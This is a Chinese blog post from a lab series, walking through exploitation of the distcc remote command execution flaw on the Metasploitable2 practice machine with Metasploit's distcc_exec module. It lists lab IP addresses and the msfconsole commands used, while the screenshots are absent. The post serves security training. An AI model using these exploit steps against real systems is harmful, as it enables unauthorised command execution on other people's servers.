您当前的位置: 首页 > 

星球守护者

暂无认证

  • 3浏览

    0关注

    641博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

Metasploitable2靶机之第七篇--Distcc后门漏洞

星球守护者 发布时间:2021-04-02 22:07:06 ,浏览量:3

文章目录
      • 环境
      • 原理
      • 漏洞利用
          • 第一步 ,启动metasploit
          • 第二步选择漏洞库
          • 第三步 设置参数,开始攻击
          • 第四步 利用成功,执行验证
      • 摘抄

环境 主机地址Metasploitable2192.168.232.202kali-linux192.168.232.129 原理
  • Distcc用于大量代码在网络服务器上的分布式编译,
  • 但是如果配置不严格,容易被滥用执行命令,
  • 该漏洞是XCode 1.5版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制
漏洞利用 第一步 ,启动metasploit
msfconsole

在这里插入图片描述

第二步选择漏洞库
search search distcc_exec
use  exploit/unix/misc/distcc_exec

在这里插入图片描述

第三步 设置参数,开始攻击
show options
Set RHOST 192.168.232.202设置要攻击的IP
exploit

在这里插入图片描述

第四步 利用成功,执行验证

在这里插入图片描述 在这里插入图片描述

摘抄 橘子不是唯一的水果,

就像世间没有唯一的答案。

– 珍妮特・温特森 《橘子不是唯一的水果》

关注
打赏
1662051426
查看更多评论
立即登录/注册

微信扫码登录

0.1834s